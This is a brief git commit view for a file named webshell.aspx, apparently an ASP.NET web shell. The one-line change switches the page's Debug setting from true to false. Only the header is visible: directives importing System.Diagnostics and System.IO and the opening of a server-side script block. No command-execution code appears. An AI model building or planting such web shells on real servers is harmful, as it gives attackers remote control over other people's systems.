Update webshell.aspx

This commit is contained in:
Mariusz 2019-02-04 17:27:19 +01:00 committed by GitHub
parent f43c458574
commit faf9dba2aa
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -1,4 +1,4 @@
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Page Language="C#" Debug="false" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">